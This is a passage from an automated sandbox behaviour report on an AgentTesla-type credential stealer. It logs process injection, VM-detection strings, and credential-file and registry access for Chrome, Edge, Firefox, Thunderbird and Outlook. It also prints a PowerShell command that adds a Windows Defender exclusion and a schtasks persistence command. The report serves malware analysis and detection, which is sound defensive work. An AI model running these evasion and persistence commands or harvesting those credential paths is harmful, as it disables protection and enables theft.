                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeThread delayed: delay time: 1197735Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 99875
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 99765
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 99640
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 99531
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 99421
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 99297
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 99187
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 99078
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98968
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98844
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98734
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98625
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98515
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98401
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98297
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98187
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 98078
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97968
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97859
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97750
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97640
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97531
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97422
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97312
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97203
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 97093
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 96984
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 96874
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199968
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199859
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199749
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199640
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199531
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199421
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199312
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199203
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1199093
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198984
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198874
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198765
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198656
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198545
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198437
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198327
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198218
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1198099
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1197966
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1197859
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeThread delayed: delay time: 1197750
                    Source: tXBTtgndxsp.exe, 00000008.00000002.1290331490.00000000008E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe, 00000007.00000002.3692396965.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, tXBTtgndxsp.exe, 00000014.00000002.3695981082.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000015.00000002.3690929096.000001E83EA31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"Jump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeMemory written: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpD46C.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tXBTtgndxsp" /XML "C:\Users\user\AppData\Local\Temp\tmpE610.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeProcess created: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe "C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3700297871.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3700297871.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3700297871.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe PID: 5616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe PID: 7272, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tXBTtgndxsp.exe PID: 8128, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\tXBTtgndxsp.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000014.00000002.3700333358.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3700297871.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe PID: 5616, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe PID: 7272, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tXBTtgndxsp.exe PID: 8128, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a7a830.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe.3a40010.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.3700297871.0000000002EED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3700297871.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3700297871.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.3688800545.0000000000426000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1250066076.000000000393E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
